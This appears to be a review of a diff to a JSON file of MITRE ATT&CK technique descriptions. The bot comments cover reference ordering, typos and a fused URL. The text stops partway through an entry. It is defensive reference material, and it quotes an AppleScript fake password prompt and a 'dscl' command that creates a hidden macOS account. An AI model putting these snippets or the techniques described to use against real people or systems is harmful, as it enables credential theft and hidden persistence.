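Review bot: The added reference `https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh` points at a branch path whose contents move as the repository is reorganized, so the `Metasploit SSH Module` citation in the description may stop resolving to what it was meant to cite. A permalink pinned to a commit, `https://github.com/rapid7/metasploit-framework/tree/<commit>/modules/exploits/linux/ssh` with the commit chosen at citation time, or the module's documentation page would be stable. The other new ref, the Microsoft local-accounts page, is already a versioned docs URL and needs no change.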
@@ -8540,7 +9031,7 @@ "value": "Account Manipulation - T1098" }, { - "description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reg)hide NOV 2006 Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to establish Persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. 
(Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) for RPC communication.", + "description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to establish Persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) for RPC communication.", "meta": { "external_id": "T1112", "kill_chain": [ 
@@ -8560,11 +9051,11 @@
 "https://attack.mitre.org/techniques/T1112",
 "https://technet.microsoft.com/en-us/library/cc732643.aspx",
 "https://docs.microsoft.com/sysinternals/downloads/reghide",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull",
- "https://technet.microsoft.com/en-us/library/cc754820.aspx",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/",
 "https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353",
+ "https://technet.microsoft.com/en-us/library/cc754820.aspx",
 "https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/"
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull"
 ]
 },
 "uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
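Review bot: This refs hunk only reorders existing URLs (regdelnull and cc754820 move to the end, the Trend Micro post moves up) without adding or removing any, which is pure diff churn and makes the real content changes elsewhere in the commit harder to review. The same reorder-only pattern recurs in the hunks at `@@ -8806,11 +9302,12 @@`, `@@ -8959,9 +9456,9 @@`, `@@ -9086,8 +9583,8 @@` and `@@ -9218,17 +9715,35 @@`. Since JSON array order carries no meaning for a refs list, the generator should emit refs in a deterministic order (for example sorted, or strictly in first-citation order) so that regenerating the galaxy does not rewrite unchanged entries.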
@@ -8667,23 +9158,28 @@ "value": "Email Collection - T1114" }, { - "description": "When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task. Adversaries can mimic this functionality to prompt users for credentials with a normal-looking prompt. This type of prompt can be accomplished with AppleScript:\n\nset thePassword to the text returned of (display dialog \"AdobeUpdater needs permission to check for updates. Please authenticate.\" default answer \"\")\n (Citation: OSX Keydnap malware)\n\nAdversaries can prompt a user for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite. (Citation: OSX Malware Exploits MacKeeper)", + "description": "When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1088)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1155)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and [PowerShell](https://attack.mitre.org/techniques/T1086)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015).", "meta": { "external_id": "T1141", "kill_chain": [ "mitre-attack:credential-access" ], "mitre_data_sources": [ + "Process 
monitoring",
+ "Process command-line parameters",
 "User interface",
- "Process monitoring"
+ "PowerShell logs"
 ],
 "mitre_platforms": [
- "macOS"
+ "macOS",
+ "Windows"
 ],
 "refs": [
 "https://attack.mitre.org/techniques/T1141",
+ "https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html",
+ "https://logrhythm.com/blog/do-you-trust-your-computer/",
 "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/",
- "https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html"
+ "https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/"
 ]
 },
 "uuid": "91ce1ede-107f-4d8b-bf4c-735e8789c94b",
@@ -8788,7 +9284,7 @@ "value": "Automated Collection - T1119" }, { - "description": "Microsoft’s Open Office XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017)\n\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\n\nAdversaries may abuse this technology to initially conceal malicious code to be executed via documents (i.e. [Scripting](https://attack.mitre.org/techniques/T1064)). Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. These documents can be delivered via other techniques such as [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017)\n\nThis technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. 
(Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)", + "description": "Microsoft’s Open Office XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017)\n\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\n\nAdversaries may abuse this technology to initially conceal malicious code to be executed via documents (i.e. [Scripting](https://attack.mitre.org/techniques/T1064)). Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017)\n\nThis technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. 
(Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)",
 "meta": {
 "external_id": "T1221",
 "kill_chain": [
@@ -8806,11 +9302,12 @@
 "refs": [
 "https://attack.mitre.org/techniques/T1221",
 "https://docs.microsoft.com/previous-versions/office/developer/office-2007/aa338205(v=office.12)",
- "https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104",
+ "https://www.sans.org/reading-room/whitepapers/testing/template-injection-attacks-bypassing-security-controls-living-land-38780",
+ "http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html",
 "https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/",
+ "https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104",
 "https://blog.talosintelligence.com/2017/07/template-injection.html",
- "https://github.com/ryhanson/phishery",
- "http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html"
+ "https://github.com/ryhanson/phishery"
 ]
 },
 "uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534",
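Review bot: The new Template Injection description line (it starts two lines earlier in the hunk) still says OOXML files are `ZIP archives compromised of various XML files`, where `comprised of` (or `composed of`) is meant; in a security corpus "compromised" reads as a claim about the files being attacked, so this is worth fixing while the string is being rewritten. The same sentence lists the formats as `(.docx, xlsx, .pptx)` and should read `(.docx, .xlsx, .pptx)`. The only intended change in this line, the added `(Citation: SANS Brian Wiltse Template Injection)` tag, does have a matching new SANS URL in the refs hunk that follows.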
@@ -8942,7 +9439,7 @@ "value": "Domain Fronting - T1172" }, { - "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager are loaded into every process that calls the ubiquitously used application programming interface (API) functions: (Citation: Endgame Process Injection July 2017)\n\n* CreateProcess\n* CreateProcessAsUser\n* CreateProcessWithLoginW\n* CreateProcessWithTokenW\n* WinExec\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.", + "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Endgame Process Injection July 2017)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.", "meta": { "external_id": "T1182", "kill_chain": [ 
@@ -8959,9 +9456,9 @@
 ],
 "refs": [
 "https://attack.mitre.org/techniques/T1182",
+ "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
 "https://technet.microsoft.com/en-us/sysinternals/bb963902",
- "https://forum.sysinternals.com/appcertdlls_topic12546.html",
- "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
+ "https://forum.sysinternals.com/appcertdlls_topic12546.html"
 ]
 },
 "uuid": "4bf5845d-a814-4490-bc5c-ccdee6043025",
@@ -9067,7 +9564,7 @@ "value": "Create Account - T1136" }, { - "description": "The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Endgame Process Injection July 2017) Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses [Hooking](https://attack.mitre.org/techniques/T1179) to redirect the code as necessary in order to communicate with the OS. A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). 
Similar to [Hooking](https://attack.mitre.org/techniques/T1179), utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.", + "description": "The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Endgame Process Injection July 2017) Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses [Hooking](https://attack.mitre.org/techniques/T1179) to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. 
However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to [Hooking](https://attack.mitre.org/techniques/T1179), utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.", "meta": { "external_id": "T1138", "kill_chain": [ @@ -9086,8 +9583,8 @@ ], "refs": [ "https://attack.mitre.org/techniques/T1138", - "https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf", - "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", + "https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf" ] }, "uuid": "7c93aa74-4bc0-4a9e-90ea-f25f86301566", 
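Review bot: The rewritten Application Shimming description (its `+` line starts on the previous line of the hunk) only inserts a paragraph break, but it leaves `communicate with the OS. \n\nA list` with a stray space before the `\n\n`, and it carries over `Structure Exception Handling (DisableSEH)`, where the Windows mechanism is `Structured Exception Handling`. Both are in the new line and can be corrected in place without touching the refs hunk that follows.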
@@ -9206,7 +9703,7 @@ "value": "Private Keys - T1145" }, { - "description": "An adversary with physical access to a mobile device may seek to bypass the device's lockscreen.\n\n### Biometric Spoofing\nIf biometric authentication is used, an adversary could attempt to spoof a mobile device's biometric authentication mechanism. For example, SRLabs (Citation: SRLabs-Fingerprint) describes providing a fake fingerprint, and SecureIDNews describes similar work by Michigan State University (Citation: SecureIDNews-Spoof). The Sun describes a case where someone else's face was able to unlock an iPhone X with Face ID (Citation: TheSun-FaceID).\n\niOS partly mitigates this attack by requiring the device passcode rather than a fingerprint to unlock the device after every device restart and after 48 hours since the device was last unlocked (Citation: Apple-TouchID). Android has similar mitigations.\n\n### Device Unlock Code Guessing or Brute Force\nAn adversary could attempt to brute-force or otherwise guess the lockscreen passcode (typically a PIN or password), including physically observing (\"shoulder surfing\") the device owner's use of the lockscreen passcode. \n\n### Exploit Other Device Lockscreen Vulnerabilities\nTechniques have periodically been demonstrated that exploit vulnerabilities on Android (Citation: Wired-AndroidBypass), iOS (Citation: Kaspersky-iOSBypass), or other mobile devices to bypass the device lockscreen. 
The vulnerabilities are generally patched by the device/operating system vendor once they become aware of their existence.", + "description": "An adversary with physical access to a mobile device may seek to bypass the device's lockscreen.\n\n### Biometric Spoofing\nIf biometric authentication is used, an adversary could attempt to spoof a mobile device's biometric authentication mechanism(Citation: SRLabs-Fingerprint)(Citation: SecureIDNews-Spoof)(Citation: TheSun-FaceID).\n\niOS partly mitigates this attack by requiring the device passcode rather than a fingerprint to unlock the device after every device restart and after 48 hours since the device was last unlocked (Citation: Apple-TouchID). Android has similar mitigations.\n\n### Device Unlock Code Guessing or Brute Force\nAn adversary could attempt to brute-force or otherwise guess the lockscreen passcode (typically a PIN or password), including physically observing (\"shoulder surfing\") the device owner's use of the lockscreen passcode. \n\n### Exploit Other Device Lockscreen Vulnerabilities\nTechniques have periodically been demonstrated that exploit vulnerabilities on Android (Citation: Wired-AndroidBypass), iOS (Citation: Kaspersky-iOSBypass), or other mobile devices to bypass the device lockscreen. The vulnerabilities are generally patched by the device/operating system vendor once they become aware of their existence.", "meta": { "external_id": "T1461", "kill_chain": [ 
@@ -9218,17 +9715,35 @@ ], "refs": [ "https://attack.mitre.org/techniques/T1461", - "https://www.wired.com/2015/09/hack-brief-new-emergency-number-hack-easily-bypasses-android-lock-screens/", - "https://threatpost.com/ios-10-passcode-bypass-can-access-photos-contacts/122033/", "https://srlabs.de/bites/spoofing-fingerprints/", - "https://support.apple.com/en-us/HT204587", "https://thehackernews.com/2016/05/android-kernal-exploit.htmlhttps://www.secureidnews.com/news-item/another-spoof-of-mobile-biometrics/", - "https://www.thesun.co.uk/tech/5584082/iphone-x-face-unlock-tricked-broken/" + "https://www.thesun.co.uk/tech/5584082/iphone-x-face-unlock-tricked-broken/", + "https://support.apple.com/en-us/HT204587", + "https://www.wired.com/2015/09/hack-brief-new-emergency-number-hack-easily-bypasses-android-lock-screens/", + "https://threatpost.com/ios-10-passcode-bypass-can-access-photos-contacts/122033/" ] }, "uuid": "dfe29258-ce59-421c-9dee-e85cb9fa90cd", "value": "Lockscreen Bypass - T1461" }, + { + "description": "An adversary may encrypt files stored on the mobile device to prevent the user from accessing them, for example with the intent of only unlocking access to the files after a ransom is paid. Without escalated privileges, the adversary is generally limited to only encrypting files in external/shared storage locations. This technique has been demonstrated on Android. We are unaware of any demonstrated use on iOS.", + "meta": { + "external_id": "APP-28", + "kill_chain": [ + "mitre-mobile-attack:effects" + ], + "mitre_platforms": [ + "Android" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1471", + "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.html" + ] + }, + "uuid": "d9e88203-2b5d-405f-a406-2933b1e3d7e4", + "value": "Encrypt Files - T1471" + }, { "description": "Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. 
There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. By using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: sudo dscl . -create /Users/username UniqueID 401 (Citation: Cybereason OSX Pirrit).", "meta": { 
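Review bot: The Lockscreen Bypass refs array being reordered in this hunk still contains a context line where two URLs are fused into one string, `"https://thehackernews.com/2016/05/android-kernal-exploit.htmlhttps://www.secureidnews.com/news-item/another-spoof-of-mobile-biometrics/"`, so neither link is usable and the `SecureIDNews-Spoof` citation in the description has no well-formed target; since the array is rewritten anyway, it should become two entries, `"https://thehackernews.com/2016/05/android-kernal-exploit.html",` and `"https://www.secureidnews.com/news-item/another-spoof-of-mobile-biometrics/",`. The description no longer names a citation that matches the thehackernews URL, so it may be a leftover worth confirming against the upstream ATT&CK object before keeping it. The new Encrypt Files - T1471 entry in the same hunk looks well-formed and its two refs match the description.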
@@ -9297,6 +9812,24 @@ "uuid": "c1b11bf7-c68e-4fbf-a95b-28efbe7953bb", "value": "SSH Hijacking - T1184" }, + { + "description": "Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system.\n\nThese commands may also include pointers to command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", + "meta": { + "external_id": "T1481", + "kill_chain": [ + "mitre-mobile-attack:command-and-control" + ], + "mitre_platforms": [ + "Android", + "iOS" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1481" + ] + }, + "uuid": "c6a146ae-9c63-4606-97ff-e261e76e8380", + "value": "Web Service - T1481" + }, { "description": "As of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the binary’s entry point for execution. Previously, there were two headers to achieve this same effect: LC_THREAD and LC_UNIXTHREAD (Citation: Prolific OSX Malware History). 
The entry point for a binary can be hijacked so that initial execution flows to a malicious addition (either another section or a code cave) and then goes back to the initial entry point so that the victim doesn’t know anything was different (Citation: Methods of Mac Malware Persistence). By modifying a binary in this way, application whitelisting can be bypassed because the file name or application path is still the same.", "meta": { @@ -9710,7 +10243,7 @@ "value": "Credential pharming - T1374" }, { - "description": "An adversary could download a legitimate app, disassemble it, add malicious code, and then reassemble the app, for example as described by Zhou and Jiang in (Citation: Zhou). The app would appear to be the original app but contain additional malicious functionality. The adversary could then publish this app to app stores or use another delivery technique.", + "description": "An adversary could download a legitimate app, disassemble it, add malicious code, and then reassemble the app(Citation: Zhou). The app would appear to be the original app but contain additional malicious functionality. The adversary could then publish this app to app stores or use another delivery technique.", "meta": { "external_id": "APP-14", "kill_chain": [ 
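Review bot: The new Web Service - T1481 entry's refs array lists only the technique page, while its description makes specific claims (dead drop resolvers, cover from widely used services, TLS protection) without any `(Citation: …)` tag, unlike every other entry in this file where citation tags resolve to refs. If the upstream ATT&CK object for T1481 carries external references, they appear to have been dropped during generation and should be restored so the claims remain traceable; if it genuinely has none, the entry is acceptable as is. The entry otherwise matches the field set and key order of the neighbouring Encrypt Files - T1471 entry.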
@@ -9729,6 +10262,113 @@ "uuid": "a93ccb8f-3996-42e2-b7c7-bb599d4e205f", "value": "Repackaged Application - T1444" }, + { + "description": "Adversaries may destroy data data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1488) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1487) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.\n\nAdversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin 
Shares](https://attack.mitre.org/techniques/T1077).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018)", + "meta": { + "external_id": "T1485", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "File monitoring", + "Process command-line parameters", + "Process monitoring" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1485", + "https://www.symantec.com/connect/blogs/shamoon-attacks", + "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html", + "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf", + "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/", + "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html" + ] + }, + "uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "value": "Data Destruction - T1485" + }, + { + "description": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. 
These devices could include the motherboard, hard drive, or video cards.", + "meta": { + "external_id": "T1495", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "BIOS", + "Component firmware" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1495", + "https://www.symantec.com/security-center/writeup/2000-122010-2655-99", + "http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research" + ] + }, + "uuid": "f5bb433e-bdf6-4781-84bc-35e97e43be89", + "value": "Firmware Corruption - T1495" + }, + { + "description": "Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. \n\nOne common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.", + "meta": { + "external_id": "T1496", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "Process use of network", + "Process monitoring", + "Network protocol analysis", + "Network device logs" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1496", + "https://securelist.com/lazarus-under-the-hood/77908/" + ] + }, + "uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "value": "Resource Hijacking - T1496" + }, + { + "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. 
Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)", + "meta": { + "external_id": "T1489", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "Process command-line parameters", + "Process monitoring", + "Windows Registry", + "API monitoring" + ], + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1489", + "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://www.secureworks.com/research/wcry-ransomware-analysis" + ] + }, + "uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "value": "Service Stop - T1489" + }, { "description": "During the boot process, macOS executes source /etc/rc.common, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). 
